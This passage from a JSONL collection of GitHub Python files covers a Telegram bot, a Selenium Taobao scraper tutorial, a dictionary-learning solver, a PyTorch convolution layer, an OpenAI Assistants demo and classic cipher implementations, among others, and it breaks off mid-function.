self.connection.connect()\n\n # конечно же, создавать таблицы каждый раз при запуске бота не нужно.\n # Нужно это вынести куда нибудь отдельно\n self.connection.create_tables()\n print('Бот запущен, подключение к базе установлено')\n \n async def on_shutdown(self, dispatcher):\n self.connection.close()\n print('Бот остановлен, подключение с базой разорвано')\n \n def start(self) -> None:\n self.architecture.build()\n \n executor.start_polling(\n self.dispatcher,\n skip_updates=True,\n on_startup=self.on_startup,\n on_shutdown=self.on_shutdown,\n )\n # skip_updates - бот не будет отвечать на сообщения, которые были отправлены, когда он был не онлайн\n","repo_name":"pten4uk99/admission-bot","sub_path":"bot/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4197616669","text":"import csv\n\nfrom requests import get\nfrom bs4 import BeautifulSoup\n\n\ndef parse():\n timezones = []\n with open('timezones.html') as f:\n html = f.read()\n soup = BeautifulSoup(html, 'html.parser')\n for i in soup.find_all('tr'):\n time_list = []\n for q in i.find_all('td'):\n time_list.append(q.get_text())\n timezones.append(time_list)\n with open('times.csv', 'w', encoding='utf8') as f:\n writer = csv.writer(f, delimiter=';')\n for i in timezones:\n writer.writerow([q.strip() for q in i])\n\n\ninf = {}\nwith open('times.csv', 'r', encoding='utf8') as f:\n reader = csv.reader(f, delimiter=';')\n for i in reader:\n if i:\n inf[i[2]] = int(i[5][1:3].replace('в€’', '-')) * 1 if i[5][0] == '+' else -1\nprint(inf)\nprint(inf['Europe/Moscow'])\n","repo_name":"belozerov-yaroslav/schedule_skill","sub_path":"timezone parser.py","file_name":"timezone parser.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2845369683","text":"'''\ndriver.find_element_by_name()\n查找符合条件的单个元素\ndriver.find_elements_by_name()\n查找符合条件的一组元素'''\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC # 预期条件\nfrom selenium.common.exceptions import TimeoutException\nfrom pyquery import PyQuery as pq # 解析工具,也可以用xpath吧\nimport re\nfrom pymongo import MongoClient\n\nclient = MongoClient()\ndb = client.taobao\nhaseeset = db.haseenotebook # 创建神舟笔记本集合\nbrowser = webdriver.Chrome() # 打开Chrome浏览器\nwait = WebDriverWait(browser, 10) # 等待时间\n\n\n# 打开淘宝,\ndef search(kd):\n try:\n browser.get('https://www.taobao.com/') # 打开url\n input = wait.until(\n EC.presence_of_element_located(\n (By.CSS_SELECTOR, \"#q\"))) # 定位搜索框\n submit = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, '#J_TSearchForm > div.search-button > button'))) # 定位搜索按钮,见图\n input.send_keys(kd) # 向搜索框发送关键字\n submit.click() # 点击搜索按钮\n total = wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR,\n '#mainsrp-pager > div > div > div > div.total'))) # 获取定位商品列表页的总页数,见页脚图\n get_products() # 调用下方函数,获取搜索结果第一页商品信息\n print(total.text)\n return total.text\n except TimeoutException:\n return search() # 超时再次调用\n\n\n# 跳转到下一页\ndef next_page(page_number):\n try:\n input = wait.until(\n EC.presence_of_element_located(\n (By.CSS_SELECTOR, \"#mainsrp-pager > div > div > div > div.form > input\"))) # 页码输入框\n submit = wait.until(EC.element_to_be_clickable(\n (By.CSS_SELECTOR, '#mainsrp-pager > div > div > div > div.form > span.btn.J_Submit')))\n input.clear() # 清空页码框\n input.send_keys(page_number) # 发送目标页码\n submit.click() # 点击跳转按钮\n wait.until(EC.text_to_be_present_in_element(\n (By.CSS_SELECTOR, '#mainsrp-pager > div > div > div > ul > li.item.active > span'),\n str(page_number))) # 当前页码\n get_products() # 获取该页商品信息\n except TimeoutException:\n next_page(page_number) # 超时再次调用\n\n\n# 获取某页上的所有商品信息,保存到库里\ndef get_products():\n products = []\n wait.until(EC.presence_of_element_located(\n (By.CSS_SELECTOR, '#mainsrp-itemlist .items .item'))) # 等待时间到了以后,定位某搜索结果页下,所有单个商品\n html = browser.page_source # html源码\n doc = pq(html) # 应该是返回一个HTML文档对象\n # pyquery (browser.page_source)就相当于requests.get(url)获取的包含网页数据的response对象\n items = doc('#mainsrp-itemlist .items .item').items() # 获取商品列表中的所有商品\n for item in items: # 从商品里获取信息,pyquery\n product = {\n 'image': item.find('.pic .img').attr('src'),\n 'price': item.find('.price').text(),\n 'deal': item.find('.deal-cnt').text()[:-3], # 这里为什么有个index我不清楚\n 'title': item.find('.title').text(),\n 'shop': item.find('.shop').text(),\n 'location': item.find('.location').text(),\n }\n products.append(product)\n print(product) # 打印单个商品json信息\n haseeset.insert(product)\n\n\ndef main(kd):\n total = search(kd) # 总爬取页数,第 1 页已在search()中处理\n total = int(re.compile('(\\d+)').search(total).group(1))\n for i in range(2, total + 1): # 从第 2 页开始,爬取所有的数据用total+1\n next_page(i)\n\n\nif __name__ == '__main__':\n main('神舟笔记本')\n","repo_name":"yangzhaoyunfei/crawler","sub_path":"ref/1-8-使用自动化神器Selenium爬取动态网页(案例三:爬取淘宝商品).py","file_name":"1-8-使用自动化神器Selenium爬取动态网页(案例三:爬取淘宝商品).py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41070138004","text":"def menu():\r\n print(\"Enter 1: Laksa - $3.50\")\r\n print(\"Enter 2: Nasi Lemak - $3.00\")\r\n print(\"Enter 3: Popiah - $1.80\")\r\n print(\"Enter 4: Mee Siam - $2.50\")\r\n print(\"Enter -9: Exit\")\r\n\r\ntotal= 0\r\norder=[ ]\r\nmenu() \r\nchoice=input(\"Enter item code: \")\r\nwhile choice!=\"-9\":\r\n if choice== \"1\":\r\n total=total+3.50\r\n order.append(\"Laksa\")\r\n print(\"You have ordered Laksa - $3.50\")\r\n elif choice==\"2\":\r\n total=total+3.00 \r\n order.append(\"Nasi Lemak\")\r\n print(\"You have ordered Nasi Lemak - $3.00\") \r\n elif choice==\"3\":\r\n total=total+1.80 \r\n order.append(\"Popiah\")\r\n print(\"You have ordered Popiah - $1.80\") \r\n elif choice==\"4\":\r\n total=total+2.50 \r\n order.append(\"Mee Siam\")\r\n print(\"You have ordered Mee Siam - $2.50\") \r\n menu()\r\n choice=input(\"Enter item code: \")\r\nprint(order)\r\nprint(\"Total is \"+ str(total))\r\nprint(\"Completed. Thank you.\")","repo_name":"WJChoong/Exercise-Python","sub_path":"Exercise/order_food.py","file_name":"order_food.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32474076097","text":"\nfrom .solver import Solver\n\nfrom scipy.optimize._linesearch import scalar_search_armijo\nimport numpy as np\n\n\nclass PGD(Solver):\n\n def __init__(self, kwargs) -> None:\n super().__init__(kwargs)\n\n self.step_size = None\n self.init_step_size = 0.01\n self.min_step_size = 1e-10\n self.tol = 1e-8\n self.max_iter = 300\n\n def step(self):\n \"\"\"\n Perform 1 iteration of the method.\n \"\"\"\n\n # Precompute constants\n self._computeConstants()\n\n # Initialization\n if not self.step_size:\n self.step_size = self.init_step_size\n D = self.D.getDictionary()\n objective = self._objectiveFunction(D)\n\n # Iterate over all atoms\n for i_atom, atom in enumerate(self.D.yieldAtoms()):\n # print(f'\\nAtom {i_atom}')\n\n # Iterate over parameter\n for i_param in range(len(atom.parameters)):\n # print(f'\\t Parameter {i_param}')\n\n # Get atom derivative\n atom_derivative = atom.getDerivative(i_param)\n\n # Compute gradient\n gradient = self._gradPartial(\n D, atom_derivative, i_atom\n )\n\n # Get step size\n self.step_size, objective = self._ArmijoLineSearch(\n self.step_size, D, gradient, objective\n )\n # print(\n # 'Armijo step size =', self.step_size,\n # 'gradient =', gradient\n # )\n\n # Step size check: if we did not find a valid step size,\n # restart. Otherwise, update the parameters\n if (self.step_size is None) or (self.step_size < self.min_step_size):\n self.step_size = 0.01\n else:\n atom.updateParameter(\n i_param,\n atom.parameters[i_param] - self.step_size*gradient\n )\n D = self.D.getDictionary()\n\n return\n\n def _objectiveFunction(self, D):\n \"\"\"\n Compute the value of the objective function.\n\n Parameters\n ----------\n D : array, shape (n_atoms, n_channels, *atom_support)\n Current dictionary\n ztz, ztX, XtX : Constant to accelerate the computation\n when updating D.\n \"\"\"\n\n grad_D = 0.5 * self._gradD(D)\n cost = (D * grad_D).sum()\n\n return cost + 0.5*self.XtX\n\n def _gradD(self, D):\n \"\"\"\n Compute the gradient of the reconstruction loss relative to D.\n\n Parameters\n ----------\n constants : dict or None\n Constant to accelerate the computation of the gradient\n\n Returns\n -------\n grad : array, shape (n_atoms * n_times_valid)\n The gradient\n \"\"\"\n return self._tensordot_convolve(self.L, self.ztz, D) - self.ztX\n\n def _gradPartial(self, D, atom_derivative, i_atom):\n \"\"\"\n Compute the gradient of the reconstruction loss relative to the\n atom parameters using the chain rule.\n \"\"\"\n\n # Get gradient relative to D\n grad_D = self._gradD(D)\n\n # Chain rule\n grad_atom = np.dot(grad_D, atom_derivative)\n\n return grad_atom[i_atom]\n\n def _ArmijoLineSearch(self, step_size, D_hat, grad, obj):\n \"\"\"\n Armijo backtracking line search to find an adequate step size.\n \"\"\"\n\n # Local function for the line search\n def phi(step_size):\n D = D_hat - step_size*grad\n return self._objectiveFunction(D)\n\n norm_grad = np.dot(grad.ravel(), grad.ravel())\n step_size, obj_next = scalar_search_armijo(\n phi=phi,\n phi0=obj,\n derphi0=-norm_grad,\n c1=1e-5,\n alpha0=step_size,\n amin=self.min_step_size\n )\n\n return step_size, obj_next\n\n def _computeConstants(self):\n \"\"\"\n Precompute constants to simplify the gradient computation.\n \"\"\"\n\n Z = self.Z.getActivations()\n\n self.ztz = self._compute_ztz(Z, self.N, self.K, self.L)\n self.ztX = self._compute_ztX(Z, self.X, self.P, self.K, self.L)\n self.XtX = self._compute_XtX(self.X)\n\n @staticmethod\n def _compute_ztz(z, N, K, L):\n \"\"\"\n ztz.shape = n_atoms, n_atoms, 2 * n_times_atom - 1\n z.shape = n_trials, n_atoms, n_times - n_times_atom + 1)\n \"\"\"\n\n ztz = np.zeros(shape=(K, K, 2*L-1))\n t0 = L - 1\n for i in range(N):\n for k0 in range(K):\n for k in range(K):\n for t in range(L):\n if t == 0:\n ztz[k0, k, t0] += (z[i, k0] * z[i, k]).sum()\n else:\n ztz[k0, k, t0 + t] += (\n z[i, k0, :-t] * z[i, k, t:]).sum()\n ztz[k0, k, t0 - t] += (\n z[i, k0, t:] * z[i, k, :-t]).sum()\n return ztz\n\n @staticmethod\n def _compute_ztX(z, X, P, K, L):\n \"\"\"\n z.shape = n_trials, n_atoms, n_times - n_times_atom + 1)\n X.shape = n_trials, n_channels, n_times\n ztX.shape = n_atoms, n_channels, n_times_atom\n \"\"\"\n\n ztX = np.zeros((K, P, L))\n for n, k, t in zip(*z.nonzero()):\n ztX[k, :, :] += z[n, k, t] * X[n, :, t:t+L]\n\n return ztX\n\n @staticmethod\n def _compute_XtX(X):\n return np.dot(X.ravel(), X.ravel())\n\n @staticmethod\n def _tensordot_convolve(L, ztz, D):\n \"\"\"\n Compute the multivariate (valid) convolution of ztz and D\n\n Parameters\n ----------\n ztz: array, shape = (n_atoms, n_atoms, 2 * n_times_atom - 1)\n Activations\n D: array, shape = (n_atoms, n_channels, n_times_atom)\n Dictionnary\n\n Returns\n -------\n G : array, shape = (n_atoms, n_channels, n_times_atom)\n Gradient\n \"\"\"\n\n D_revert = D[:, :, ::-1]\n\n G = np.zeros_like(D)\n for t in range(L):\n G[:, :, t] = np.tensordot(\n ztz[:, :, t:t+L],\n D_revert,\n axes=([1, 2], [0, 2])\n )\n\n return G\n","repo_name":"axelroques/CPDL","sub_path":"cpdl/optimization/pgd.py","file_name":"pgd.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29223404771","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.parameter import Parameter\nfrom torch.nn import init\nimport math\nimport torch.nn.backends\n\n\nclass SAPConv(nn.Module):\n def __init__(self, in_channels, out_channels, is_bias=True):\n super(SAPConv, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.is_bias = is_bias\n self.weight = Parameter(torch.Tensor(out_channels, in_channels, 3, 3))\n if self.is_bias:\n self.bias = Parameter(torch.Tensor(out_channels))\n else:\n self.bias = None\n self.reset_parameters()\n\n def reset_parameters(self):\n init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n if self.bias is not None:\n fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in)\n init.uniform_(self.bias, -bound, bound)\n\n def forward(self, x):\n conv1 = F.conv2d(x,\n weight=self.weight,\n bias=self.bias,\n stride=1,\n padding=1,\n dilation=1)\n conv1 = F.relu(conv1)\n conv2 = F.conv2d(x,\n weight=self.weight,\n bias=self.bias,\n stride=1,\n padding=2,\n dilation=2)\n conv2 = F.relu(conv2)\n conv3 = F.conv2d(x,\n weight=self.weight,\n bias=self.bias,\n stride=1,\n padding=3,\n dilation=3)\n conv3 = F.relu(conv3)\n # fusion\n conv1_sum = torch.sum(conv1, dim=1, keepdim=True)\n conv2_sum = torch.sum(conv2, dim=1, keepdim=True)\n conv3_sum = torch.sum(conv3, dim=1, keepdim=True)\n attention = torch.cat([conv1_sum, conv2_sum, conv3_sum], dim=1)\n\n # find the global min value\n min_value = torch.min(attention)\n max_value = torch.max(attention)\n\n attention = (attention - min_value + 1e-20) / \\\n (max_value - min_value + 1e-10)\n enhanced_attention = -1 / (torch.log2(attention) - 1e-20)\n # enhanced_attention = torch.exp(enhanced_attention)\n if torch.min(enhanced_attention) < 0:\n print(\"The value within attention is error!!\")\n softmax = F.softmax(enhanced_attention, dim=1)\n lambda1, lambda2, lambda3 = softmax.split(1, dim=1)\n return conv1.mul(lambda1) + conv2.mul(lambda2) + conv3.mul(lambda3)\n","repo_name":"TangXu-Group/Meta-hashing","sub_path":"utils/Self_Adaptive_Conv.py","file_name":"Self_Adaptive_Conv.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"33420531203","text":"import sys\r\n\r\n\r\nt = int(input().strip())\r\nfor a0 in range(t):\r\n n,k = input().strip().split(' ')\r\n n,k = [int(n),int(k)]\r\n num = input().strip()\r\n largest = 0\r\n for x in range(n-k):\r\n current = 1\r\n for y in range(k):\r\n current *= int(num[x+y])\r\n if current > largest:\r\n largest = current\r\n print(largest)\r\n","repo_name":"thalper/Project-Euler","sub_path":"Euler8.py","file_name":"Euler8.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40271743310","text":"import numpy as np\nimport gym\n\n\nclass DummyKitchenEnv(gym.Env):\n # from https://github.com/google-research/relay-policy-learning/blob/4230de23d7de8081d9f648f8017e2d42fc32e5b2/adept_envs/adept_envs/franka/kitchen_multitask_v0.py#L37\n N_DOF_ROBOT = 9\n N_DOF_OBJECT = 21\n\n def __init__(self, **kwargs):\n self.params = kwargs\n\n action_dim = (\n 8\n if self.params['ctrl_mode'] == 'mocap' and self.params['rot_use_euler']\n else self.N_DOF_ROBOT\n )\n if self.params.get('binary_gripper', False):\n action_dim -= 1\n\n act_lower = -1 * np.ones((action_dim,))\n act_upper = 1 * np.ones((action_dim,))\n self.action_space = gym.spaces.Box(act_lower, act_upper)\n\n def __getattr__(self, attr):\n return self.params[attr]\n\n def _get_obs_dict(self):\n obs_dict = {\n 'robot_qp': np.zeros(self.N_DOF_ROBOT),\n 'robot_qv': np.zeros(self.N_DOF_ROBOT),\n 'obj_qp': np.zeros(self.N_DOF_OBJECT),\n 'obj_qv': np.zeros(self.N_DOF_OBJECT),\n }\n if self.params['with_obs_ee']:\n obs_dict['ee_qp'] = np.zeros(6 if self.params['rot_use_euler'] else 7)\n if self.params['with_obs_forces']:\n obs_dict['ee_forces'] = np.zeros(12)\n return obs_dict\n","repo_name":"etaoxing/domain-shift-benchmark","sub_path":"dsb/envs/kitchen_shift/dummy_kitchen_env.py","file_name":"dummy_kitchen_env.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"30181241226","text":"# https://www.acmicpc.net/problem/1261\n\nfrom collections import deque\n\ndirections = [(-1, 0), (0, 1), (1, 0), (0, -1)]\n\nM, N = map(int, input().split())\nmaze = [list(map(int, input())) for _ in range(N)]\ndist = [[-1] * M for _ in range(N)]\ndist[0][0] = 0\n\nqueue = deque([(0, 0)])\nwhile queue:\n y, x = queue.popleft()\n for dy, dx in directions:\n Y, X = y+dy, x+dx\n if 0 <= Y < N and 0 <= X < M:\n if dist[Y][X] == -1:\n if maze[Y][X] == 0:\n dist[Y][X] = dist[y][x]\n queue.appendleft((Y, X))\n else:\n dist[Y][X] = dist[y][x] + 1\n queue.append((Y, X))\n\nprint(dist[-1][-1])\n","repo_name":"imYourChoi/algorithm_study","sub_path":"graph/dijkstra/algospot.py","file_name":"algospot.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3070974734","text":"import quandl\nimport pandas as pd\nimport pickle\n\nimport datetime\nimport matplotlib.pyplot as plt\n\napi_key = \"********\"\n\ndef state_list():\n states = pd.read_html('https://simple.wikipedia.org/wiki/List_of_U.S._states')\n return states[0][1][1:]\n\ndef fetch_initial_state_data():\n main_df = pd.DataFrame()\n\n for abbrv in state_list():\n query = \"FMAC/HPI_\" + str(abbrv)\n #print(\"******************* \" + query)\n df = quandl.get(query, authtoken=api_key)\n if main_df.empty:\n main_df = df\n else:\n main_df = main_df.join(df, lsuffix='_left', rsuffix='_right')\n\n #print(main_df.head())\n\n \"\"\"\n Serializing the data\n \"\"\"\n pickle_out = open('fiddy_states.pickle', 'wb')\n pickle.dump(main_df, pickle_out)\n pickle_out.close()\n\ndef load_serialied_data():\n pickle_in = open('fiddy_states.pickle', 'rb')\n HPI_data = pickle.load(pickle_in)\n print(HPI_data)\n\nif __name__ == '__main__':\n #fetch_initial_state_data()\n load_serialied_data()\n\n\n","repo_name":"venkatram64/python_ml","sub_path":"pwork2/ex_11.py","file_name":"ex_11.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42157500431","text":"from .Base import *;\n\nclass Summary(Base):\n\t\"\"\"\n\t\tRepository class for Gathering entity.\n\t\"\"\"\n\t\n\tdef init(self):\n\t\tself.entity = ada.entities.Summary;\n\t\n\tdef status(self):\n\t\t\n\t\t# Get necessary information from current delivery\n\t\tdelivery = self.repos.deliveries.get_current();\n\t\tsummary = delivery.re_gathering.re_voting.re_order.re_summary;\n\t\tpayment = summary.re_payment;\n\t\t\n\t\t# Create default response\n\t\tresponse = 'There is no information about current summary.';\n\t\t\n\t\t# If there are information about summary, create detailed response\n\t\tif payment is not None:\n\t\t\tpayer = 'None' if payment.re_payer is None else payment.re_payer.nick;\n\t\t\tprice = float(payment.price)/100; #TODO: This is ugly format fix!\n\t\t\tresponse = 'Payer {}, price {}, etofa {}.';\n\t\t\tresponse = response.format(payer, price, payment.etofa);\n\t\t\n\t\t# Return a response\n\t\treturn response;\n\t\n\tdef payment(self,\n\t\t\tpayer : ada.entities.User,\n\t\t\tprice : int,\n\t\t\tetofa : datetime.datetime,\n\t\t\tlog : ada.entities.Log):\n\t\t\n\t\t# If price is not given,\n\t\t# then payer does not exists\n\t\tif price == 0:\n\t\t\tuser = None;\n\t\t\tpayer = None;\n\t\t\n\t\t# Validating price value\n\t\tif price < 0:\n\t\t\tmsg = 'The price can not be negative!';\n\t\t\traise ValueError(msg);\n\t\telif price > 1000000:\n\t\t\tmsg = 'The price is too high!';\n\t\t\traise ValueError(msg);\n\t\t\n\t\t# Get or create payment object for current delivery\n\t\tdelivery = self.repos.deliveries.get_current();\n\t\tsummary = delivery.re_gathering.re_voting.re_order.re_summary;\n\t\tpayment = self.repos.payments.get_or_create(summary);\n\t\t\n\t\t# Update payment object\n\t\tpayment.re_payer = payer;\n\t\tpayment.price = price;\n\t\tpayment.etofa = etofa;\n\t\tpayment.re_log = log;\n\t\t\n\t\t# Save changes to database\n\t\tself.database.session.commit();\n\t\t\n\t\t# Return payment\n\t\treturn payment;\n\t\n\tdef etofa(self,\n\t\t\tetofa : datetime.datetime):\n\t\t\n\t\t# Get or create payment object for current delivery\n\t\tdelivery = self.repos.deliveries.get_current();\n\t\tsummary = delivery.re_gathering.re_voting.re_order.re_summary;\n\t\tpayment = self.repos.payments.get_or_create(summary);\n\t\t\n\t\t# Change current etofa\n\t\tpayment.etofa = etofa;\n\t\t\n\t\t# Save changes to database\n\t\tself.database.session.commit();\n\t\t\n\t\t# Return current payment\n\t\treturn payment;\n\t\n\tdef next(self):\n\t\t\n\t\t# Get necessary information from current delivery\n\t\tdelivery = self.repos.deliveries.get_current();\n\t\tsummary = delivery.re_gathering.re_voting.re_order.re_summary;\n\t\tpayment = summary.re_payment;\n\t\t\n\t\t# Test if all necessary information are given\n\t\tif not payment:\n\t\t\traise Exception('There is no payment!');\n\t\tif not payment.re_payer:\n\t\t\traise Exception('There is no payer!');\n\t\tif not payment.price:\n\t\t\traise Exception('There is no price!');\n\t\tif not payment.re_log:\n\t\t\traise Exception('There is no log!');\n\t\t\n\t\t# Create new adjustment\n\t\tadjustment = ada.entities.Adjustment(summary);\n\t\t\n\t\t# Change delivery stage\n\t\tdelivery.stage = ada.entities.Stage.ADJUST;\n\t\t\n\t\t# Commit all changes\n\t\tself.database.session.add(adjustment);\n\t\tself.database.session.commit();\n\t\t\n\t\treturn '';\n\n","repo_name":"Samsung/ADA","sub_path":"src/ada/services/Summary.py","file_name":"Summary.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"15424398924","text":"class cat:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n\r\n def __str__(self):\r\n return f'x: {self.x}, y: {self.y}'\r\n\r\n def __lt__(self, other):\r\n if self.x < other.x:\r\n return True\r\n else: return False\r\n\r\n # def __gt__(self, other):\r\n # if self.x > other.x:\r\n # return False\r\n\r\n\r\ndef main():\r\n a = [1, 2, 3, 4, 5, 6]\r\n b = ['q', 'w', 'e', 'r', 't', 'y']\r\n # print(f'a: {a}, {\"\".join(a)}')\r\n print(f'b: {b}')\r\n\r\n A = cat(58888, 10)\r\n B = cat(555, 1000)\r\n print(A < B)\r\n\r\n M = ['12345', '67890', '11223', '34455', '66778']\r\n for i in range(len(M)): print(M[i])\r\n for i in range(1, len(M)-1):\r\n for j in range(1, len(M[i])-1):\r\n print(M[i][j], end='')\r\n print()\r\n\r\n\r\n\r\nmain()","repo_name":"KonradRomanski/python_tasks","sub_path":"pp_test_learning.py","file_name":"pp_test_learning.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6852065587","text":"# INSTALL OPENAI IN TERMINAL\n\n# !pip install --upgrade openai\n\n# Check version:\n# !pip show openai | grep Version\n # ERROR\n\n\n# IMPORT LIBRARIES\nimport os\nimport e2b\nimport openai\nfrom openai import OpenAI\n\n# SET UP API KEY\nfrom dotenv import load_dotenv\nimport json\n\nload_dotenv()\nopenai.api_key = os.environ[\"OPENAI_API_KEY\"]\n\n# Pretty printing helper\nimport json\ndef show_json(obj):\n print(json.loads(obj.model_dump_json()))\n\n\nclient = OpenAI()\n\nassistant = client.beta.assistants.create(\n name=\"Math Tutor\",\n instructions=\"You are a personal math tutor. Answer questions briefly, in a sentence or less.\",\n model=\"gpt-4-1106-preview\",\n)\nshow_json(assistant)\n\n\n\n\nMATH_ASSISTANT_ID = assistant.id # or a hard-coded ID like \"asst-...\"\n\n\ndef submit_message(assistant_id, thread, user_message):\n client.beta.threads.messages.create(\n thread_id=thread.id, role=\"user\", content=user_message\n )\n return client.beta.threads.runs.create(\n thread_id=thread.id,\n assistant_id=assistant_id,\n )\n\n\ndef get_response(thread):\n return client.beta.threads.messages.list(thread_id=thread.id, order=\"asc\")\n\n\n\n# Create user requests in threads\n\ndef create_thread_and_run(user_input):\n thread = client.beta.threads.create()\n run = submit_message(MATH_ASSISTANT_ID, thread, user_input)\n return thread, run\n\n\n# Emulating concurrent user requests\nthread1, run1 = create_thread_and_run(\n \"I need to solve the equation `3x + 11 = 14`. Can you help me?\"\n)\nthread2, run2 = create_thread_and_run(\"Could you explain linear algebra to me?\")\nthread3, run3 = create_thread_and_run(\"I don't like math. What can I do?\")\n\n# Now all Runs are executing...\n\n\n# Get responses from runs\n\nimport time\n\n# Pretty printing helper\ndef pretty_print(messages):\n print(\"# Messages\")\n for m in messages:\n print(f\"{m.role}: {m.content[0].text.value}\")\n print()\n\n\n# Waiting in a loop\ndef wait_on_run(run, thread):\n while run.status == \"queued\" or run.status == \"in_progress\":\n run = client.beta.threads.runs.retrieve(\n thread_id=thread.id,\n run_id=run.id,\n )\n time.sleep(0.5)\n return run\n\n\n# Wait for Run 1\nrun1 = wait_on_run(run1, thread1)\npretty_print(get_response(thread1))\n\n# Wait for Run 2\nrun2 = wait_on_run(run2, thread2)\npretty_print(get_response(thread2))\n\n# Wait for Run 3\nrun3 = wait_on_run(run3, thread3)\npretty_print(get_response(thread3))\n\n# Thank our assistant on Thread 3 :)\nrun4 = submit_message(MATH_ASSISTANT_ID, thread3, \"Thank you!\")\nrun4 = wait_on_run(run4, thread3)\npretty_print(get_response(thread3))\n\n\n# Update th assistant with a tool: Code interpreter\n\nassistant = client.beta.assistants.update(\n MATH_ASSISTANT_ID,\n tools=[{\"type\": \"code_interpreter\"}],\n)\nshow_json(assistant)\n\n\n# Ask assistant to use the tool\n\nthread, run = create_thread_and_run(\n \"Generate the first 20 fibbonaci numbers with code.\"\n)\nrun = wait_on_run(run, thread)\npretty_print(get_response(thread))\n\n\n\nassistant = client.beta.assistants.retrieve(\"ai-developer-assistant\")\nrun = client.beta.threads.runs.create(thread_id=thread.id, assistant_id=assistant.id)\n\n# Start polling the run object\nwhile True:\n if run.status == \"requires_action\": \n outputs = sandbox.openai.actions.run(run) \n if len(outputs) > 0: \n client.beta.threads.runs.submit_tool_outputs( \n thread_id=thread.id, run_id=run.id, tool_outputs=outputs \n ) \n\n # ... handle rest of the `run` states\n\n run = client.beta.threads.runs.retrieve(thread_id=thread.id, run_id=run.id)\n\n# Close the sandbox once everything is done\nsandbox.close()","repo_name":"tizkovatereza/E2B_guides","sub_path":"old/openai_assistant_api_v1.1.py","file_name":"openai_assistant_api_v1.1.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"10633374291","text":"'''\nClassic Ciphers\nAuthor: PAN Zewen Xavier\n'''\n\n\ndef caesar(m: str, k: int = None) -> str:\n '''\n # Caesar cipher\n @param `k`: how many bits each letter will be right-shift in alphabet.\n - Encrypt: caesar(msg, k)\n - Decrypt: caesar(encrpyted, -k)\n '''\n\n LEN_OF_ALPHABET = 26\n k = k or 3\n crypted = ''\n for c in m:\n if c.isupper():\n crypted += chr(((ord(c) - ord('A') + k) %\n LEN_OF_ALPHABET) + ord('A'))\n elif c.islower():\n crypted += chr(((ord(c) - ord('a') + k) %\n LEN_OF_ALPHABET) + ord('a'))\n else: # keep non-alphabet letters\n crypted += c\n return crypted\n\n\ndef monoalpha(m: str, mapfrom: str, mapto: str) -> str:\n '''\n # Monoalphabetic Substitution Ciphers\n @param `mapfrom`: 'abc...ABC...123...'\n @param `mapto`: 'ekl...EKL...!@#...'\n\n - Encrypt: monoalpha(msg, 'abc...ABC...123...', 'ekl...EKL...!@#...')\n - Decrypt: monoalpha(encrypted, 'ekl...EKL...!@#...', 'abc...ABC...123...', 'ekl...EKL...!@#...')\n '''\n\n charMap = dict(zip(mapfrom, mapto))\n return ''.join([charMap[c] if c in mapfrom else c for c in m])\n\n\ndef vigenere(m: str, key: str, encrypt: bool = True) -> str:\n '''# Vigenere Cipher'''\n\n # Generate vigenere cipher table\n textSpace = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n table = []\n for i in range(len(textSpace)):\n table.append(textSpace.copy())\n textSpace.append(textSpace.pop(0))\n\n # Extend key to have same length as msg\n m = m.upper()\n key = key.upper()\n while len(key) < len(m):\n key += key\n key = key[:len(m)]\n\n res = ''\n if encrypt:\n for i in range(len(m)):\n k, c = key[i], m[i] # current letter in key, current letter in msg\n rw = ord(k)-ord('A')\n col = ord(c)-ord('A')\n res += table[rw][col]\n else:\n for i in range(len(m)):\n k, c = key[i], m[i] # current letter in key, current letter in msg\n rw = ord(k)-ord('A')\n for i in range(len(table[rw])):\n if table[rw][i] == c:\n res += table[0][i]\n\n return res\n\n\ndef otp(m: str, key: str) -> str:\n '''\n # One-Time Pad\n Use caecar cipher to implement one-time pad.\n Note that all letters will become upper case within this funtion.\n '''\n def getKey(l1: str, l2: str) -> str:\n assert l1[0].isupper()\n assert l2[0].isupper()\n return chr((ord(l1)-ord('A')+ord(l2)-ord('A')) % 26+ord('A'))\n\n m, key = m.upper(), key.upper()\n\n assert len(m) <= len(\n key), 